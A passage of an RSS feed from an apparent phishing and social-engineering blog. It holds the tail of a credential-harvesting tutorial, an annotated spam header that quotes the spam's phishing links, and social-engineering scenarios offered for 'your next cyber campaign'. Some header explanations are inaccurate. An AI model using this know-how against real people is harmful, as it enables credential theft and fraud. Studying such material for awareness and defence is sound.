<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">data.txt </p>
</div>



<h2 class="wp-block-heading">Conclusion</h2>



<p>As we have demonstrated&#8230; it&#8217;s absolutely trivial to create a web form to harvest credentials. Login forms do not actually need to go anywhere or do anything to be effective. With 2x files and 30 lines of code (excluding styles and javascript), we can create an effective credential trap&#8230; small, but optional, embellishments complete the social engineering piece. </p>



<p class="has-text-align-center">What&#8217;s next?</p>



<div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex">
<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<p class="has-text-align-center">Related Topics</p>



<div class="wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-outline inter-section is-style-outline--4"><a class="wp-block-button__link has-secondary-color has-text-color has-text-align-center wp-element-button" href="https://phishandchips.io/category/framework/data-harvesting/">Data Harvesting</a></div>
</div>
</div>



<div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
<p class="has-text-align-center">Next Topic</p>



<div class="wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-outline inter-section is-style-outline--5"><a class="wp-block-button__link has-secondary-color has-text-color wp-element-button" href="https://phishandchips.io/category/framework/evasion/">Evasion</a></div>
</div>
</div>
</div>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">923</post-id>	</item>
		<item>
		<title>What are Email Headers?</title>
		<link>https://phishandchips.io/what-are-email-headers/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 22 Sep 2023 20:29:29 +0000</pubDate>
				<category><![CDATA[Email Crafting]]></category>
		<category><![CDATA[Framework]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=917</guid>

					<description><![CDATA[Emails have become an integral part of our personal and professional lives. While we usually focus on the content of an email, there&#8217;s a wealth of information hidden in its header. Email headers contain crucial details about the email&#8217;s origin, delivery path, and authenticity. Head, what? Email headers, also known as message headers, are a [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Emails have become an integral part of our personal and professional lives. While we usually focus on the content of an email, there&#8217;s a wealth of information hidden in its header. Email headers contain crucial details about the email&#8217;s origin, delivery path, and authenticity. </p>



<h3 class="wp-block-heading">Head, what?</h3>



<p>Email headers, also known as message headers, are a block of text at the beginning of an email that provides essential metadata about the email&#8217;s journey. To view an email&#8217;s headers, you can usually find an option like &#8220;View Message Source&#8221; or &#8220;Show Original&#8221; in your email client.</p>



<figure class="wp-block-image aligncenter size-full wp-duotone-unset-6"><img decoding="async" width="220" height="330" src="https://phishandchips.io/wp-content/uploads/2023/09/headers.png" alt="" class="wp-image-918" srcset="https://phishandchips.io/wp-content/uploads/2023/09/headers.png 220w, https://phishandchips.io/wp-content/uploads/2023/09/headers-200x300.png 200w" sizes="(max-width: 220px) 100vw, 220px" /></figure>



<p>Here is an example of a RAW header from a pretty bogus-looking message:</p>



<div class="wp-block-group has-black-background-color has-background has-global-padding is-layout-constrained wp-container-core-group-is-layout-95730b41 wp-block-group-is-layout-constrained" style="padding-top:0;padding-bottom:0">

<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:300px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap;">Delivered-To: phishandchips.io@gmail.com<br />
Received: by 2002:a05:7000:704c:b0:518:6939:5a47 with SMTP id t12csp2267847mat;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Wed, 20 Sep 2023 20:27:49 -0700 (PDT)<br />
X-Google-Smtp-Source: AGHT+IFlYgh6cSUYc5vF0uwuiA/TjmWnfkjBIWVaaOrJm2Fnkjt4x668N5PScciUJJrH8ex14K77<br />
X-Received: by 2002:aa7:c614:0:b0:530:f880:ca74 with SMTP id h20-20020aa7c614000000b00530f880ca74mr3610809edq.28.1695266869411;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Wed, 20 Sep 2023 20:27:49 -0700 (PDT)<br />
ARC-Seal: i=2; a=rsa-sha256; t=1695266869; cv=pass;<br />
&nbsp; &nbsp; &nbsp; &nbsp; d=google.com; s=arc-20160816;<br />
&nbsp; &nbsp; &nbsp; &nbsp; b=XXXXX<br />
ARC-Message-Signature: i=2; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;<br />
&nbsp; &nbsp; &nbsp; &nbsp; h=feedback-id:precedence:subject:cc:message-id:list-unsubscribe:from<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;:list-id:list-id:date:mime-version:to;<br />
&nbsp; &nbsp; &nbsp; &nbsp; bh=f9JKLxsmxVEDS8HfdQZuiBvO3txjQarfOuTylLcMQdw=;<br />
&nbsp; &nbsp; &nbsp; &nbsp; fh=e69IIXWAFhL7Gv60vfGA8nV4JOjkyr9JYr37FBPFklI=;<br />
&nbsp; &nbsp; &nbsp; &nbsp; b=XXXX<br />
ARC-Authentication-Results: i=2; mx.google.com;<br />
&nbsp; &nbsp; &nbsp; &nbsp;arc=pass (i=1);<br />
&nbsp; &nbsp; &nbsp; &nbsp;spf=pass (google.com: domain of postmaster@eur01-ve1-obe.outbound.protection.outlook.com designates 2a01:111:f400:7e01::207 as permitted sender) smtp.helo=EUR01-VE1-obe.outbound.protection.outlook.com<br />
Return-Path: &lt;&gt;<br />
Received: from EUR01-VE1-obe.outbound.protection.outlook.com (mail-ve1eur01lp20207.outbound.protection.outlook.com. [2a01:111:f400:7e01::207])<br />
&nbsp; &nbsp; &nbsp; &nbsp; by mx.google.com with ESMTPS id bm17-20020a0564020b1100b0052e9eff1e61si384400edb.395.2023.09.20.20.27.49<br />
&nbsp; &nbsp; &nbsp; &nbsp; for &lt;phishandchips.io@gmail.com&gt;<br />
&nbsp; &nbsp; &nbsp; &nbsp; (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);<br />
&nbsp; &nbsp; &nbsp; &nbsp; Wed, 20 Sep 2023 20:27:49 -0700 (PDT)<br />
Received-SPF: pass (google.com: domain of postmaster@eur01-ve1-obe.outbound.protection.outlook.com designates 2a01:111:f400:7e01::207 as permitted sender) client-ip=2a01:111:f400:7e01::207;<br />
Authentication-Results: mx.google.com;<br />
&nbsp; &nbsp; &nbsp; &nbsp;arc=pass (i=1);<br />
&nbsp; &nbsp; &nbsp; &nbsp;spf=pass (google.com: domain of postmaster@eur01-ve1-obe.outbound.protection.outlook.com designates 2a01:111:f400:7e01::207 as permitted sender) smtp.helo=EUR01-VE1-obe.outbound.protection.outlook.com<br />
ARC-Seal: i=1; a=rsa-sha256; s=arcselector9901; d=microsoft.com; cv=none; b=XXXXX<br />
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector9901; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=XXXXXX<br />
ARC-Authentication-Results: i=1; mx.microsoft.com 1; spf=softfail (sender ip is 45.79.81.156) smtp.rcpttodomain=gmail.com smtp.helo=notes.io; dmarc=none action=none header.from=eafdvcsdvc.onmicrosoft.com; dkim=none (message not signed); arc=none<br />
X-MS-Exchange-Authentication-Results: spf=softfail (sender IP is 45.79.81.156) smtp.helo=notes.io; dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=EAFDVCSDVC.onmicrosoft.com;<br />
To: &lt;phishandchips.io@aol.com&gt;<br />
MIME-Version: 2.0<br />
Date: Thu, 21 Sep 2023 05:25:05 +0200<br />
X-Feedback-ID: 1781223:SG<br />
List-ID: &lt;7202588.xt.local&gt;<br />
List-ID: &lt;.7289367.xt.local&gt;<br />
From: SolarBill &lt;infoygwszzlnyhfpvdjvpztee@eafdvcsdvc.onmicrosoft.com&gt;<br />
X-Mailer: BM23 Mail<br />
List-Unsubscribe: &lt;maiANlto:1cxmbtz2tak6wbt21fgmhn8rshqzt5f-u@comms.teamsnap.com&gt;, &lt;http://comms.teamsnap.com/public/webform/render_form/default/XXXXX&gt;<br />
Content-Type: multipart/alternative; boundary=&quot;_36adda4e-755a-4bf6-b3f6-570ea8903171_&quot;<br />
X-campaignID: bm23_bbmqysfahtjioxvqkuvfgymqygehbfg<br />
Message-ID: &lt;e01f7ce7-c7fb-47fb-rnfvdyarenbsmngcvrw-743d24f27996@atl1s07mta2411.xt.local&gt;<br />
Cc: &lt;phishandchips.io@gmail.com&gt;<br />
Subject: Re:<br />
Precedence: bulk<br />
Feedback-ID: 325-anexp#nret-fa:account-notifier<br />
X-EOPAttributedMessage: 0<br />
X-MS-PublicTrafficType: Email<br />
X-MS-TrafficTypeDiagnostic: DB5PEPF00014B9E:EE_|PA4PR02MB6861:EE_<br />
X-MS-Office365-Filtering-Correlation-Id: 51d4ce3b-3f03-4ef4-9595-08dbba52ba9a<br />
X-MS-Exchange-SenderADCheck: 1<br />
X-MS-Exchange-AntiSpam-Relay: 0<br />
X-Microsoft-Antispam: BCL:0;<br />
X-Microsoft-Antispam-Message-Info: [block]<br />
X-Forefront-Antispam-Report: CIP:45.79.81.156;CTRY:US;LANG:en;SCL:5;SRV:;IPV:CAL;SFV:SPM;H:notes.io;PTR:45-79-81-156.ip.linodeusercontent.com;CAT:OSPM;SFS:(13230031)(376002)(39860400002)(346002)(136003)(396003)(1800799009)(451199024)(1690799017)(7200799017)(5400799018)(82310400011)(46966006)(83380400001)(70206006)(42186006)(336012)(19810500001)(110136005)(26005)(70586007)(42882007)(82740400003)(3480700007)(166002)(47076005)(35950700001)(40480700001)(33964004)(41320700001)(17440700003)(40140700001)(34070700002)(46730400001)(508600001)(9686003)(81166007)(2906002)(84970400001)(8400799017)(8676002)(4326008)(8936002)(78352004)(41300700001)(5660300002)(7116003)(1406899027)(5006899006)(104086003)(42472002)(38122002);DIR:OUT;SFP:1501;<br />
X-OriginatorOrg: EAFDVCSDVC.onmicrosoft.com<br />
X-MS-Exchange-CrossTenant-OriginalArrivalTime: 21 Sep 2023 03:27:48.1178 (UTC)<br />
X-MS-Exchange-CrossTenant-Network-Message-Id: 51d4ce3b-3f03-4ef4-9595-08dbba52ba9a<br />
X-MS-Exchange-CrossTenant-Id: 2b44a31f-6747-4f4c-ad1f-f3dad63dc557<br />
X-MS-Exchange-CrossTenant-OriginalAttributedTenantConnectingIp: TenantId=2b44a31f-6747-4f4c-ad1f-f3dad63dc557;Ip=[45.79.81.156];Helo=[notes.io]<br />
X-MS-Exchange-CrossTenant-AuthSource: DB5PEPF00014B9E.eurprd02.prod.outlook.com<br />
X-MS-Exchange-CrossTenant-AuthAs: Anonymous<br />
X-MS-Exchange-CrossTenant-FromEntityHeader: HybridOnPrem<br />
X-MS-Exchange-Transport-CrossTenantHeadersStamped: PA4PR02MB6861<br />
<br />
--_36adda4e-755a-4bf6-b3f6-570ea8903171_<br />
<br />
<br />
--_36adda4e-755a-4bf6-b3f6-570ea8903171_<br />
Content-Type: text/html; charset=utf-8<br />
<br />
&nbsp;<br />
--_36adda4e-755a-4bf6-b3f6-570ea8903171_<br />
Content-Type: text/html; charset=utf-8<br />
<br />
Save Your Money With SOLAR<br />
<br />
&lt;CeNteR&gt;<br />
&lt;IMG sRc=&quot;https://sdfsdf3.s3.eu-west-3.amazonaws.com/wresdf.png#yJMrDv1DOP3F&quot; useMaP=&quot;#IOPIUY465789&quot;&gt;&lt;MAp NAMe=IOPIUY465789&gt;<br />
&lt;arEa hReF=&quot;https://sdfsdf3.s3.eu-west-3.amazonaws.com/sedfgvs.html?tsNeVNv4qP8LE2atDhRjYqd2boVUtHtAVoyWzrSbyik6UpgyNl0dHYkSZsj5It3zviTFbij28OZm8qJ43sMK2M9ugE7DzDrsAVaa#cl/3332_md/18/3860/296/3/252119&quot; COORDs=&quot;1,0,599,1200&quot; SHape=rect&gt;<br />
&lt;ArEa HRef=https://sdfsdf3.s3.eu-west-3.amazonaws.com/sedfgvs.html?MBgGSyDGcagp3a5Ix3b6qxuY1lHBSxLebvd5WKTtuIKpU3EduVPiC9220JEzZsTMkRmmtFIxdh2Mav1gzPsJSiwrC8WKzpEaRR2I#un/3332_md/18/3860/296/3/252119 cOOrDS=&quot;561,1218,533,1206&quot; shape=0&gt;<br />
&lt;/CeNteR&gt;<br />
&lt;object&gt;<br />
&lt;ApplEt&gt;<br />
<br />
<br />
<br />
<br />
&lt;p&gt;Mayor Mike Blake&lt;br /&gt;65 Stone Street&lt;br /&gt;Cocoa, FL 32922&lt;br /&gt;Dear Tree City USA Community Member,&lt;br /&gt;On behalf of the Arbor Day Foundation, I&amp;rsquo;m thrilled to congratulate Cocoa on earning recognition as a&lt;br /&gt;2022 Tree City USA. Residents of Cocoa should be proud to live in a community that makes the planting&lt;br /&gt;and care of trees a priority.&lt;br /&gt;Founded in 1976, Tree City USA is a partnership between the Arbor Day Foundation, the U.S. Forest&lt;br /&gt;Service, and the National Association of State Foresters. Cocoa is part of an incredible network of more&lt;br /&gt;than 3,600 Tree City USA communities nationwide, with a combined population of 155 million.&lt;br /&gt;Over the last few years, the value and importance of trees has become increasingly clear. Cities and towns&lt;br /&gt;across the globe are facing issues with air quality, water resources, personal health and well-being, and&lt;br /&gt;energy use. Cocoa has taken steps to create to a brighter, greener future.&lt;br /&gt;We hope you are as excited as we are to share this accomplishment with your local media and your&lt;br /&gt;residents. Enclosed in this packet is a press release for you to distribute at your convenience.&lt;br /&gt;We&amp;rsquo;re excited to celebrate your commitment to the people and trees of Cocoa. Thank you, again, for your&lt;br /&gt;efforts.&lt;br /&gt;Best Regards,&lt;br /&gt;Dan Lambe&lt;br /&gt;Arbor Day Foundation Chief Executive&lt;br /&gt;FOR IMMEDIATE RELEASE&lt;br /&gt;Contact:&lt;br /&gt;Leighton Eusebio&lt;br /&gt;Arbor Day Foundation&lt;br /&gt;402-473-2103&lt;br /&gt;lesuebio@arborday.org&lt;br /&gt;Arbor Day Foundation Names Cocoa a 2022 Tree City USA&amp;reg;&lt;br /&gt;LINCOLN, Nebraska (12/13/2022) &amp;ndash; Cocoa was named a 2022 Tree City USA by the Arbor Day&lt;br /&gt;Foundation to honor its commitment to effective urban forest management.&lt;br /&gt;Cocoa achieved Tree City USA recognition by meeting the program's four requirements: maintaining a&lt;br /&gt;tree board or department, having a tree care ordinance, dedicating an annual community forestry budget of&lt;br /&gt;at least $2 per capita, and hosting an Arbor Day observance and proclamation.&lt;br /&gt;The Tree City USA program is sponsored by the Arbor Day Foundation, in partnership with the U.S.&lt;br /&gt;Forest Service and the National Association of State Foresters.&lt;br /&gt;&amp;ldquo;Tree City USA communities see the positive effects of an urban forest firsthand,&amp;rdquo; said Dan Lambe, chief&lt;br /&gt;executive of the Arbor Day Foundation. &amp;ldquo;The trees being planted and cared for by Cocoa are ensuring that&lt;br /&gt;generations to come will enjoy to a better quality of life. Additionally, participation in this program brings&lt;br /&gt;residents together and creates a sense of civic pride, whether it&amp;rsquo;s through volunteer engagement or public&lt;br /&gt;education.&amp;rdquo;&lt;br /&gt;If ever there was a time for trees, now is that time. Communities worldwide are facing issues with air&lt;br /&gt;quality, water resources, personal health and well-being, energy use, and extreme heat and flooding.&lt;br /&gt;Cocoa is doing its part to address these challenges for residents both now and in the future.&lt;br /&gt;More information on the program is available at arborday.org/TreeCityUSA.&lt;br /&gt;About the Arbor Day Foundation&lt;br /&gt;Founded in 1972, the Arbor Day Foundation has grown to become the largest nonprofit membership&lt;br /&gt;organization dedicated to planting trees, with more than one million members, supporters and valued&lt;br /&gt;partners. Since 1972, almost 500 million Arbor Day Foundation trees have been planted in neighborhoods,&lt;br /&gt;communities, cities and forests throughout the world. Our vision is to lead toward a world where trees are&lt;br /&gt;used to solve issues critical to survival.&lt;br /&gt;As one of the world's largest operating conservation foundations, the Arbor Day Foundation, through its&lt;br /&gt;members, partners and programs, educates and engages stakeholders and communities across the globe to&lt;br /&gt;involve themselves in its mission of planting, nurturing and celebrating trees. More information is&lt;br /&gt;available at arborday.org.&lt;/p&gt;<br />
<br />
--_36adda4e-755a-4bf6-b3f6-570ea8903171_--</div></div>




<p class="has-small-font-size" style="padding-top:0px;padding-right:var(--wp--preset--spacing--30);padding-bottom:0px;padding-left:var(--wp--preset--spacing--30)">RAW Message Header of some spam</p>
</div>



<h3 class="wp-block-heading">What is the meaning of all this?</h3>



<p>Let&#8217;s break it all down:<br><br><strong>Delivered-To: <a href="mailto:phishandchips.io@gmail.com">phishandchips.io@gmail.com</a></strong>:</p>



<ul class="wp-block-list">
<li>This field indicates that the email was delivered to the specified Gmail address.</li>
</ul>



<p><strong>Received: by 2002:a05:7000:704c:b0:518:6939:5a47 with SMTP id t12csp2267847mat; Wed, 20 Sep 2023 20:27:49 -0700 (PDT)</strong>:</p>



<ul class="wp-block-list">
<li>This line shows the email&#8217;s delivery status, mentioning the Gmail server&#8217;s IP and timestamp.</li>
</ul>



<p><strong>X-Google-Smtp-Source: AGHT+IFlYgh6cSUYc5vF0uwuiA/TjmWnfkjBIWVaaOrJm2Fnkjt4x668N5PScciUJJrH8ex14K77</strong>:</p>



<ul class="wp-block-list">
<li>This field may contain additional information about the email&#8217;s source, possibly for Gmail&#8217;s internal tracking purposes.</li>
</ul>



<p><strong>X-Received: by 2002:aa7:c614:0:b0:530:f880:ca74 with SMTP id h20-20020aa7c614000000b00530f880ca74mr3610809edq.28.1695266869411; Wed, 20 Sep 2023 20:27:49 -0700 (PDT)</strong>:</p>



<ul class="wp-block-list">
<li>Similar to the second field, this provides information about the email&#8217;s receipt and routing.</li>
</ul>



<p><strong>ARC-Seal: i=2; a=rsa-sha256; t=1695266869; cv=pass; d=google.com; s=arc-20160816; b=XXXXX</strong>:</p>



<ul class="wp-block-list">
<li>This field is related to ARC (Authenticated Received Chain), a protocol that helps authenticate email messages. It confirms the email&#8217;s integrity.</li>
</ul>



<p><strong>ARC-Message-Signature: i=2; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=feedback-id:precedence:subject:cc:message-id:list-unsubscribe:from list-id:list-id:date:mime-version:to; bh=f9JKLxsmxVEDS8HfdQZuiBvO3txjQarfOuTylLcMQdw=; fh=e69IIXWAFhL7Gv60vfGA8nV4JOjkyr9JYr37FBPFklI=; b=XXXX</strong>:</p>



<ul class="wp-block-list">
<li>This section is related to ARC and its cryptographic signatures. It verifies the email&#8217;s authenticity and integrity.</li>
</ul>



<p><strong>ARC-Authentication-Results: i=2; mx.google.com; arc=pass (i=1); spf=pass (google.com: domain of <a href="mailto:postmaster@eur01-ve1-obe.outbound.protection.outlook.com">postmaster@eur01-ve1-obe.outbound.protection.outlook.com</a> designates 2a01:111:f400:7e01::207 as permitted sender) smtp.helo=EUR01-VE1-obe.outbound.protection.outlook.com</strong>:</p>



<ul class="wp-block-list">
<li>This field confirms that the email passed authentication checks, including SPF (Sender Policy Framework).</li>
</ul>



<p><strong>Return-Path: &lt;&gt;</strong>:</p>



<ul class="wp-block-list">
<li>The &#8220;Return-Path&#8221; is empty, indicating that it&#8217;s a bounce or non-delivery notification.</li>
</ul>



<p><strong>Received: from EUR01-VE1-obe.outbound.protection.outlook.com (mail-ve1eur01lp20207.outbound.protection.outlook.com. [2a01:111:f400:7e01::207])&#8230;</strong>:</p>



<ul class="wp-block-list">
<li>This line shows that the email originated from an Outlook.com server and provides server information.</li>
</ul>



<p><strong>Received-SPF: pass (google.com: domain of <a href="mailto:postmaster@eur01-ve1-obe.outbound.protection.outlook.com">postmaster@eur01-ve1-obe.outbound.protection.outlook.com</a> designates 2a01:111:f400:7e01::207 as permitted sender) client-ip=2a01:111:f400:7e01::207;</strong>:</p>



<ul class="wp-block-list">
<li>SPF passed, indicating that the email sender&#8217;s domain (outlook.com) authorized the server&#8217;s IP address to send emails on its behalf.</li>
</ul>



<p><strong>Authentication-Results: mx.google.com; arc=pass (i=1); spf=pass (google.com: domain of <a href="mailto:postmaster@eur01-ve1-obe.outbound.protection.outlook.com">postmaster@eur01-ve1-obe.outbound.protection.outlook.com</a> designates 2a01:111:f400:7e01::207 as permitted sender) smtp.helo=EUR01-VE1-obe.outbound.protection.outlook.com</strong>:</p>



<ul class="wp-block-list">
<li>This confirms the email&#8217;s authentication results, including ARC and SPF.</li>
</ul>



<p><strong>ARC-Seal: i=1; a=rsa-sha256; s=arcselector9901; d=microsoft.com; cv=none; b=XXXXX</strong>:</p>



<ul class="wp-block-list">
<li>Another ARC-related seal, confirming the authenticity and integrity of the email.</li>
</ul>



<p><strong>ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector9901; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=XXXXXX</strong>:</p>



<ul class="wp-block-list">
<li>An ARC-related message signature, ensuring the email&#8217;s authenticity.</li>
</ul>



<p><strong>X-MS-Exchange-Authentication-Results: spf=softfail (sender IP is 45.79.81.156) smtp.helo=notes.io; dkim=none (message not signed); arc=none</strong>:</p>



<ul class="wp-block-list">
<li>Additional authentication results mentioning SPF softfail, indicating that the email didn&#8217;t fully pass SPF checks.</li>
</ul>



<p><strong>X-MS-Exchange-CrossTenant-OriginalArrivalTime: 21 Sep 2023 03:27:48.1178 (UTC)</strong>:</p>



<ul class="wp-block-list">
<li>This line shows the original arrival time of the email in Coordinated Universal Time (UTC).</li>
</ul>



<p><strong>From: SolarBill <a href="mailto:infoygwszzlnyhfpvdjvpztee@eafdvcsdvc.onmicrosoft.com">infoygwszzlnyhfpvdjvpztee@eafdvcsdvc.onmicrosoft.com</a></strong>:</p>



<ul class="wp-block-list">
<li>The &#8220;From&#8221; field indicates the sender&#8217;s name and email address.</li>
</ul>



<p><strong>Subject: Re:</strong>:</p>



<ul class="wp-block-list">
<li>The subject line of the email.</li>
</ul>



<p><strong>Date: Thu, 21 Sep 2023 05:25:05 +0200</strong>:</p>



<ul class="wp-block-list">
<li>The date and time when the email was sent.</li>
</ul>



<p><strong>Cc: <a href="mailto:phishandchips.io@gmail.com">phishandchips.io@gmail.com</a></strong>:</p>



<ul class="wp-block-list">
<li>The email address in the &#8220;Cc&#8221; field, indicating additional recipients.</li>
</ul>



<p><strong>Content-Type: multipart/alternative; boundary=&#8221;<em>36adda4e-755a-4bf6-b3f6-570ea8903171</em>&#8220;</strong>:</p>



<ul class="wp-block-list">
<li>The content type and boundary information for the email.</li>
</ul>



<p>The provided email appears to be from &#8220;SolarBill&#8221; and has passed some authentication checks like SPF and ARC, although there was a SPF soft-fail reported. The header confirms its route and origin from an Outlook.com server.<br>Would you click on any links in this message? 🙄</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">917</post-id>	</item>
		<item>
		<title>Crash-course in SE</title>
		<link>https://phishandchips.io/crash-course-in-social-engineering/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 22 Sep 2023 19:55:29 +0000</pubDate>
				<category><![CDATA[Framework]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<guid isPermaLink="false">https://phishandchips.io/?p=899</guid>

					<description><![CDATA[Social engineering tactics often rely on reverse-engineering people in an attempt to exploit their innate human vulnerabilities to achieve malicious objectives. At the end of the day, everything we discuss here at P&#38;C is around the attack of the system through the user. We aren&#8217;t trying to &#8220;hack&#8221; computers- an adequately secure system is impossible/improbable [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Social engineering tactics often rely on reverse-engineering people in an attempt to exploit their innate human vulnerabilities to achieve malicious objectives.</p>



<p>At the end of the day, everything we discuss here at P&amp;C is around the attack of the system through the user. We aren&#8217;t trying to &#8220;hack&#8221; computers- an adequately secure system is <em>impossible</em>/<em>improbable</em> to penetrate with our resources (and trust me, we have very few resources).<br>Instead, it&#8217;s better to simply go through the front door and not by busting it down, rather, by being invited in.</p>



<p><a href="https://phishandchips.io/social-engineering/" data-type="post" data-id="641">Social engineering</a> <mark style="background-color:#9EF9FD" class="has-inline-color"><em>is a manipulative technique intended to exploit human psychology, trust, and emotions to perform specific actions or to make specific decisions, often to the detriment of the target. </em></mark></p>



<p>Here are some good ones&#8230;</p>



<p><strong>&#8220;Trusty Caller&#8221;</strong></p>



<ul class="wp-block-list">
<li>Jane, a senior manager at a reputable company, receives a call from &#8220;David,&#8221; who claims to be the IT department. David explains there&#8217;s an urgent security update and asks Jane for her login credentials to ensure her account&#8217;s safety. Concerned, Jane shares her details without verifying David&#8217;s identity. In reality, it&#8217;s a social engineer exploiting trust to gain unauthorized access.</li>
</ul>



<p><strong>&#8220;Friendly Face&#8221;</strong></p>



<ul class="wp-block-list">
<li>John, an enthusiastic intern, joins a company. On his first day, Sarah, a seasoned employee, befriends him and offers to show him around. As they chat, Sarah casually asks about the company&#8217;s upcoming projects. John, eager to fit in, inadvertently shares confidential information, not realizing that Sarah actually works at a competitor firm.</li>
</ul>



<p><strong>&#8220;Tech Support Scam&#8221;</strong></p>



<ul class="wp-block-list">
<li>Mark receives a pop-up message on his computer, warning of a virus and providing a phone number for tech support. Panicked, Mark dials the number and connects with &#8220;Lisa,&#8221; who claims to be from a reputable tech support company. To resolve the issue, Mark grants Lisa remote access to his computer.</li>
</ul>



<p><strong>&#8220;Emergency Impersonator&#8221; Tactic</strong></p>



<ul class="wp-block-list">
<li>Emily receives an urgent email from her boss, &#8220;Michael,&#8221; requesting a wire transfer for a critical business deal. The email claims that Michael is in a remote location and unable to make the transfer himself. Trusting her boss&#8217;s email, Emily quickly initiates the transfer, not realizing that the email came from an imposter.</li>
</ul>



<p><strong>&#8220;Bait and Switch&#8221; Tactic</strong></p>



<ul class="wp-block-list">
<li>Alex, an online shopper, receives an email offering a limited-time 90% discount on a popular gadget. Excited, Alex clicks the provided link, which redirects to a convincing e-commerce website. Alex places an order using their credit card information, only to find out later that it was a fake site set up by cybercriminals to steal personal and financial data.</li>
</ul>



<h2 class="wp-block-heading">About P&amp;C</h2>



<p>Phish &amp; Chips.io is a labor of love from seasoned information security and privacy enthusiasts. Although we provide some resources around engineering technical exploits and navigating computer systems, our true passion is for educating people and the study of human social behavior.</p>



<p>To this end, we have created a <a href="https://phishandchips.io/phishing-attack-framework/" data-type="post" data-id="124">Phishing Attack Framework</a> which is a great way to navigate this site and learn more about how to utilize social engineering techniques for your next cyber campaign.<br></p>



<p>Enjoy!</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">899</post-id>	</item>
		<item>
		<title>Self-Serving Bias</title>
		<link>https://phishandchips.io/self-serving-bias/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 18 Sep 2023 21:05:43 +0000</pubDate>
				<category><![CDATA[Glossary]]></category>
		<category><![CDATA[Bias]]></category>
		<category><![CDATA[Logical Fallacies]]></category>
		<category><![CDATA[Psychology]]></category>
		<guid isPermaLink="false">https://phishandchips.io/self-serving-bias/</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">853</post-id>	</item>
		<item>
		<title>Recency Illusion</title>
		<link>https://phishandchips.io/recency-illusion/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 18 Sep 2023 21:05:43 +0000</pubDate>
				<category><![CDATA[Glossary]]></category>
		<category><![CDATA[Bias]]></category>
		<category><![CDATA[Logical Fallacies]]></category>
		<category><![CDATA[Psychology]]></category>
		<guid isPermaLink="false">https://phishandchips.io/recency-illusion/</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">852</post-id>	</item>
		<item>
		<title>Guilt Trip</title>
		<link>https://phishandchips.io/guilt-trip/</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 18 Sep 2023 21:05:43 +0000</pubDate>
				<category><![CDATA[Glossary]]></category>
		<category><![CDATA[Bias]]></category>
		<category><![CDATA[Logical Fallacies]]></category>
		<category><![CDATA[Psychology]]></category>
		<guid isPermaLink="false">https://phishandchips.io/guilt-trip/</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">851</post-id>	</item>
	</channel>
</rss>
